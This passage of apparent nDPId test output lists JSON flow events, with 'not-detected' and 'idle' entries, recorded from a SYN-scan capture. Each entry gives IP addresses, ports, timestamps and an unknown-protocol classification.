{"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":803,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":803,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1803,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5915,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1803,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5915,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":852,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":852,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1925,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10012,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1925,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1854,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5915,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1854,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5915,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10012,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3869,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3869,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3871,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3871,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3871,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3871,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5922,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5922,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":828,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5922,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":828,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5922,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5925,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5925,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1852,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5925,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1852,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5925,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3878,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":857,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3878,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":857,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10024,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3880,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10024,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3880,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 